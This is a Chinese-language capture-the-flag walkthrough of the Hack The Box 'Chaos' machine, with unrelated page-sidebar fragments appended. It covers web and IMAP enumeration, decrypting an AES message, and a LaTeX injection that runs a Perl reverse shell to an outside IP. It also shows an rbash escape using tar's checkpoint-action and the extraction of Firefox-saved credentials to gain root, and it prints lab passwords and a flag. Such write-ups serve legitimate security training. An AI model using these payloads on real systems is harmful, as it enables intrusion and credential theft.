Hack The Box Chaos WriteUp

1.端口信息,通過nmap掃描废恋,發(fā)現(xiàn)Chaos開放6個端口谈秫,主要有web及郵件服務。

端口信息

2.web服務目錄爆破鱼鼓,利用Gobuster對80端口的web服務進行發(fā)現(xiàn)拟烫。能夠在以下路徑找到wordpress:
http://10.10.10.120/wp/wordpress
image.png

3.wpscan枚舉用戶,探測發(fā)現(xiàn)當前只有human一個用戶在wordpress環(huán)境中:
wpscan --stealthy --url http://10.10.10.120/wp/wordpress/ --enumerate
enumerate

利用human用戶名可以訪問一篇加密博客迄本,獲取webmail的登錄賬戶:
username:ayush
password:jiujitsu (這個密碼決定了之后的所有步驟...)
webmail

4.登錄webmail硕淑,因為郵件服務器不運行非加密的連接請求,所以必須使用openssl連接岸梨。在草稿箱內可以找到一封包含附件的郵件喜颁,附件包含一段密文、一個加密腳本及一個密鑰曹阔。
連接服務:openssl s_client -connect chaos.htb:143 -starttls imap
查看郵箱:tag LIST "" "*" (包含草稿半开、發(fā)信、收件)
選擇草稿箱:tag SELECT Drafts
選擇郵件:tag FETCH 1 (BODY)
查看郵件:tag FETCH 1 BODY.PEEK[]
郵件原文

5.破譯密文赃份,郵件中包含3個關鍵部分寂拆。首先提到用戶sahay就是密碼奢米,其次給了一段名為enim_msg.txt的密文,最后是en.py的加密腳本纠永。經過base64解碼后鬓长,腳本的邏輯如下:

def encrypt(key, filename):
    chunksize = 64*1024
    outputFile = "en" + filename
    filesize = str(os.path.getsize(filename)).zfill(16)
    IV =Random.new().read(16)

    encryptor = AES.new(key, AES.MODE_CBC, IV)

    with open(filename, 'rb') as infile:
        with open(outputFile, 'wb') as outfile:
            outfile.write(filesize.encode('utf-8'))
            outfile.write(IV)

            while True:
                chunk = infile.read(chunksize)

                if len(chunk) == 0:
                    break
                elif len(chunk) % 16 != 0:
                    chunk += b' ' * (16 - (len(chunk) % 16))

                outfile.write(encryptor.encrypt(chunk))

def getKey(password):
            hasher = SHA256.new(password.encode('utf-8'))
            return hasher.digest()

不難看出getkey生成了最初的密鑰,輸入?yún)?shù)password就是郵件中提到的sahay尝江。encrypt采用AES CBC加密算法涉波,初始向量IV采用16位隨機字符串。base64解碼后的密文enim_msg.txt炭序,文本長度為272啤覆,剛好可以整除16,272/16=17惭聂,因此可以確定CBC分組長度為16窗声。根據(jù)AES標準,密文前16位為IV初始向量辜纲,即:
IV = 0000000000000234


IV

響應的解密函數(shù)及明文如下:

from Crypto.Hash import SHA256
from Crypto.Cipher import AES
import Crypto.Cipher.AES
from binascii import hexlify, unhexlify

def encrypt(key, filename):
    chunksize = 64*1024
    outputFile = "en" + filename
    filesize = str(os.path.getsize(filename)).zfill(16)
    IV =Random.new().read(16)

    encryptor = AES.new(key, AES.MODE_CBC, IV)

    with open(filename, 'rb') as infile:
        with open(outputFile, 'wb') as outfile:
            outfile.write(filesize.encode('utf-8'))
            outfile.write(IV)

            while True:
                chunk = infile.read(chunksize)

                if len(chunk) == 0:
                    break
                elif len(chunk) % 16 != 0:
                    chunk += b' ' * (16 - (len(chunk) % 16))

                outfile.write(encryptor.encrypt(chunk))

def getKey(password):
            hasher = SHA256.new(password.encode('utf-8'))
            return hasher.digest()

if __name__=="__main__":
    chunksize = 64*1024
    mkey = getKey("sahay")
    mIV = (b"0000000000000234")

    decipher = AES.new(mkey,AES.MODE_CBC,mIV)

    with open("demsg.txt", 'rb') as infile:
        chunk = infile.read(chunksize)
        plaintext = decipher.decrypt(chunk) 
        print plaintext

注意解密后笨觅,明文為base64編碼,前16位IV應該除去耕腾,剩余字符串可正常解碼:

明文

6.LaTeX攻擊见剩,根據(jù)提示,在/etc/hosts文件中添加對應的域名幽邓,訪問指定路徑后會看到一個pdf生成器炮温,是典型的LaTeX攻擊火脉。網頁提示只有一個模板可以被使用牵舵,嘗試后發(fā)現(xiàn)是test3模板,輸入正文并點擊生成按鈕后倦挂,網頁并不會有直接的提示畸颅,需要啟用開發(fā)者模式獲得結果,生成的pdf在路徑http://chaos.htb/J00_w1ll_f1Nd_n07H1n9_H3r3/pdf/方援。攻擊的原理及介紹請參考:https://0day.work/hacking-with-latex/
pdfTeX, Version 3.14159265-2.6-1.40.19

這里直接給出反彈POC:

\immediate\write18{perl -e 'use Socket;$i="10.10.16.49";$p=6666;
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");
open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'}

7.獲取user.txt没炒。在獲取一個www-data權限的shell后,可以利用ayush的密碼jiujitsu切換至ayush的會話中犯戏,但這是一個rbash送火,環(huán)境變量被設置在/home/ayush/.app中,拒絕了絕大多數(shù)的命令先匪,經過嘗試dir可以正常執(zhí)行种吸,在.app目錄中有tar,這可以用來逃逸rbash限制呀非。
逃逸POC:tar cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec=/bin/bash
獲得正常bash后坚俗,添加環(huán)境變量export PATH=$PATH:/usr/bin/镜盯,打印出user.txt。

獲取user.txt

8.獲取root.txt猖败。在/home/ayush目錄中發(fā)現(xiàn)速缆,該用戶安裝有mozilla firefox。檢查key4.db及cert9.db恩闻,發(fā)現(xiàn)文件體積均大于默認安裝后的大小艺糜,懷疑可能保存有用戶登錄憑據(jù)。firefox_decrypt可用于提取緩存憑據(jù)幢尚,項目地址如下:
https://github.com/unode/firefox_decrypt
上傳運行后倦踢,firefox_decrypt.py會要求輸入解密用的主密鑰,而這個密鑰正是jiujitsu侠草,提取的root密碼為:jiujitsu辱挥。利用該密碼su至root權限獲取旗標。
root

root@chaos:~# cat root.txt
cat root.txt
4eca7e09e3520e020884563cfbabbc70

最后編輯于
?著作權歸作者所有,轉載或內容合作請聯(lián)系作者
  • 序言:七十年代末边涕,一起剝皮案震驚了整個濱河市晤碘,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌功蜓,老刑警劉巖园爷,帶你破解...
    沈念sama閱讀 218,204評論 6 506
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場離奇詭異式撼,居然都是意外死亡童社,警方通過查閱死者的電腦和手機,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 93,091評論 3 395
  • 文/潘曉璐 我一進店門著隆,熙熙樓的掌柜王于貴愁眉苦臉地迎上來扰楼,“玉大人,你說我怎么就攤上這事美浦∠依担” “怎么了?”我有些...
    開封第一講書人閱讀 164,548評論 0 354
  • 文/不壞的土叔 我叫張陵浦辨,是天一觀的道長蹬竖。 經常有香客問我,道長流酬,這世上最難降的妖魔是什么币厕? 我笑而不...
    開封第一講書人閱讀 58,657評論 1 293
  • 正文 為了忘掉前任,我火速辦了婚禮芽腾,結果婚禮上旦装,老公的妹妹穿的比我還像新娘。我一直安慰自己晦嵌,他們只是感情好同辣,可當我...
    茶點故事閱讀 67,689評論 6 392
  • 文/花漫 我一把揭開白布拷姿。 她就那樣靜靜地躺著,像睡著了一般旱函。 火紅的嫁衣襯著肌膚如雪响巢。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 51,554評論 1 305
  • 那天棒妨,我揣著相機與錄音踪古,去河邊找鬼。 笑死券腔,一個胖子當著我的面吹牛伏穆,可吹牛的內容都是我干的。 我是一名探鬼主播纷纫,決...
    沈念sama閱讀 40,302評論 3 418
  • 文/蒼蘭香墨 我猛地睜開眼枕扫,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了辱魁?” 一聲冷哼從身側響起烟瞧,我...
    開封第一講書人閱讀 39,216評論 0 276
  • 序言:老撾萬榮一對情侶失蹤,失蹤者是張志新(化名)和其女友劉穎染簇,沒想到半個月后参滴,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經...
    沈念sama閱讀 45,661評論 1 314
  • 正文 獨居荒郊野嶺守林人離奇死亡锻弓,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內容為張勛視角 年9月15日...
    茶點故事閱讀 37,851評論 3 336
  • 正文 我和宋清朗相戀三年砾赔,在試婚紗的時候發(fā)現(xiàn)自己被綠了。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片青灼。...
    茶點故事閱讀 39,977評論 1 348
  • 序言:一個原本活蹦亂跳的男人離奇死亡暴心,死狀恐怖,靈堂內的尸體忽然破棺而出聚至,到底是詐尸還是另有隱情酷勺,我是刑警寧澤本橙,帶...
    沈念sama閱讀 35,697評論 5 347
  • 正文 年R本政府宣布扳躬,位于F島的核電站,受9級特大地震影響甚亭,放射性物質發(fā)生泄漏贷币。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點故事閱讀 41,306評論 3 330
  • 文/蒙蒙 一亏狰、第九天 我趴在偏房一處隱蔽的房頂上張望役纹。 院中可真熱鬧,春花似錦暇唾、人聲如沸促脉。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,898評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽瘸味。三九已至宫仗,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間旁仿,已是汗流浹背藕夫。 一陣腳步聲響...
    開封第一講書人閱讀 33,019評論 1 270
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留枯冈,地道東北人毅贮。 一個月前我還...
    沈念sama閱讀 48,138評論 3 370
  • 正文 我出身青樓,卻偏偏與公主長得像尘奏,于是被迫代替她去往敵國和親滩褥。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當晚...
    茶點故事閱讀 44,927評論 2 355

推薦閱讀更多精彩內容

  • 1. ASCII 編碼 ASCII(American Standard Code for Information ...
    s酸菜閱讀 8,688評論 0 8
  • 概述 之前一直對加密相關的算法知之甚少炫加,只知道類似DES铸题、RSA等加密算法能對數(shù)據(jù)傳輸進行加密,且各種加密算法各有...
    Henryzhu閱讀 3,019評論 0 14
  • 該wp學習自Pcat大佬在實驗吧的wp 題目地址:http://ctf5.shiyanbar.com/web/ji...
    Aluvion閱讀 5,671評論 1 0
  • 聽記 學生一邊聽一邊記琢感,可以用腦子記丢间,也可以用筆記。 作用: 提高學生注意力驹针。 提高學生記憶力烘挫。 學習語言,積累語...
    文昌許珊珊閱讀 672評論 0 0
  • 像奴隸一樣努力 活著 被夢一樣的誘惑 誘惑 突發(fā)奇想做個破罐子破摔的決定 下輩子努力收集不開心 ——《破決定》
    段童閱讀 371評論 0 5